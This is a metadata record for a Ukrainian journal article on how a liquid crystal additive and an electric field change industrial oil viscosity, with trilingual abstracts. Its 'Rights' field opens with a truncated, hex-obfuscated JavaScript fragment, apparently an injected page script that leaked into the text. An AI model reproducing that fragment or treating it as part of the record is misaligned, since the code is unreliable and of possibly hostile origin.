Record Details

THE EFFECT OF CONCENTRATION OF A LIQUID CRYSTAL ADDITIVE AND ELECTRIC FIELD ON PHYSICAL AND CHEMICAL PROPERTIES OF INDUSTRIAL OIL

Наукові журнали Національного Авіаційного Університету

View Archive Info
 
 
Field Value
 
Title THE EFFECT OF CONCENTRATION OF A LIQUID CRYSTAL ADDITIVE AND ELECTRIC FIELD ON PHYSICAL AND CHEMICAL PROPERTIES OF INDUSTRIAL OIL
Исследование влияния концентрации жидкокристаллической присадки и электрического поля на физико-химические свойства индустриального масла
Дослідження впливу концентрації рідкокристалічної присадки та електричного поля на фізико-хімічні властивості індустріальної оливи
 
Creator Voronin, Sergey; Український державний університет залізничного транспорту
Safoniuk, Ivan; Український державний університет залізничного транспорту
Anoshkina, Nataliia; Український державний університет залізничного транспорту
Kharkovsky, Alexander; Український державний університет залізничного транспорту
 
Subject
viscosity; viscosity index; industrial oil; liquid crystal additive; chilling temperature
621.89

вязкость; индекс вязкости; индустриальное масло; жидкокристаллическая присадка; температура застывания
621.89

в’язкість; індекс в’язкості; індустріальна олива; рідкокристалічна присадка; температура застигання
621.89
 
Description Objective: The objective of the article is research into the effect of liquid crystal additive concentration and electric field on the viscosity of industrial oil, and study into influence of concentration on low-temperature properties of oil. Methods: The research and calculations were made by the methods presented in State Standards DSTU GOST 33-2003, GOST 25371-201 and GOST 20287-91. Findings: The authors obtained dependencies of change in viscosity and chilling temperature of industrial oil on liquid crystal additive concentration. Besides, they obtained dependencies of change in industrial oil viscosity treated by electric field at various concentrations of a liquid crystal additive. The study deals with the viscosity index for industrial oil with various concentrations of an additive. A range of the concentrations chosen was also substantiated. The results of the research were processed in Statistica software; regression equations which described dependencies of oil viscosity on additive concentration were obtained.
Цель: Целью статьи является изучение влияния концентрации жидкокристаллической присадки и электрического поля на вязкость индустриального масла, а также исследование влияния концентрации на низкотемпературные свойства масла. Методы: Исследование и расчеты проводились по методам, описанным в государственных стандартах ГОСТ 33-2003, ГОСТ 25371-2018 и ГОСТ 20287-91. Результаты: Получены зависимости изменения вязкости и температуры застывания индустриального масла от концентрации жидкокристаллической присадки. Получена зависимость изменения вязкости индустриального масла при обработке электрическим полем, при разных концентрациях жидкокристаллической присадки. Рассчитан индекс вязкости для индустриального масла с различными концентрациями присадки. Обоснованно выбранный нами диапазон концентраций. Результаты исследований обработаны в программе Statistica, получено уравнение регрессии, описывающие зависимость вязкости масла от концентрации присадки.
Мета: Метою статті є вивчення впливу концентрації рідкокристалічної присадки та електричного поля на в’язкість індустріальної оливи, а також дослідження впливу концентрації на низькотемпературні властивості оливи. Методи: Дослідження і розрахунки проводилися за методами описаними в державних стандартах ДСТУ ГОСТ 33-2003, ГОСТ 25371-2018 та ГОСТ 20287-91. Результати: Отримано залежність зміни в’язкості та температури застигання індустріальної оливи від концентрації рідкокристалічної присадки. Отримано залежність зміни в’язкості індустріальної оливи при обробці електричним полем, за різних концентрацій рідкокристалічної присадки. Розраховано індекс в’язкості для індустріальної оливи з різними концентраціями присадки. Обґрунтовано обраний нами діапазон концентрацій. Результати досліджень оброблені в програмі Statistica, отримано рівняння регресії, які описують залежність в’язкості оливи від концентрації присадки.
 
Publisher National Aviation University
 
Contributor


 
Date 2020-05-12
 
Type


 
Format application/pdf
application/pdf
application/pdf
 
Identifier http://jrnl.nau.edu.ua/index.php/visnik/article/view/14654
10.18372/2306-1472.83.14654
 
Source Proceedings of the National Aviation University; Том 83, № 2 (2020); 70-76
Вестник Национального авиационного университета; Том 83, № 2 (2020); 70-76
Вісник Національного Авіаційного Університету; Том 83, № 2 (2020); 70-76
 
Language en
 
Rights // o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "jrnl.nau.edu.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e
Автори, які публікуються у цьому журналі, погоджуються з такими умовами:Автори залишають за собою право на авторство своєї роботи та передають журналу право першої публікації цієї роботи на умовах ліцензії Creative Commons Attribution License, котра дозволяє іншим особам вільно розповсюджувати опубліковану роботу з обов'язковим посиланням на авторів оригінальної роботи та першу публікацію роботи у цьому журналі.Автори мають право укладати самостійні додаткові угоди щодо неексклюзивного розповсюдження роботи у тому вигляді, в якому вона була опублікована цим журналом (наприклад, розміщувати роботу в електронному сховищі установи або публікувати у складі монографії), за умови збереження посилання на першу публікацію роботи у цьому журналі.Політика журналу дозволяє і заохочує розміщення авторами в мережі Інтернет (наприклад, у сховищах установ або на особистих веб-сайтах) рукопису роботи, як до подання цього рукопису до редакції, так і під час його редакційного опрацювання, оскільки це сприяє виникненню продуктивної наукової дискусії та позитивно позначається на оперативності та динаміці цитування опублікованої роботи (див. The Effect of Open Access).
 

Технічна підтримка: НДІІТТ НАУ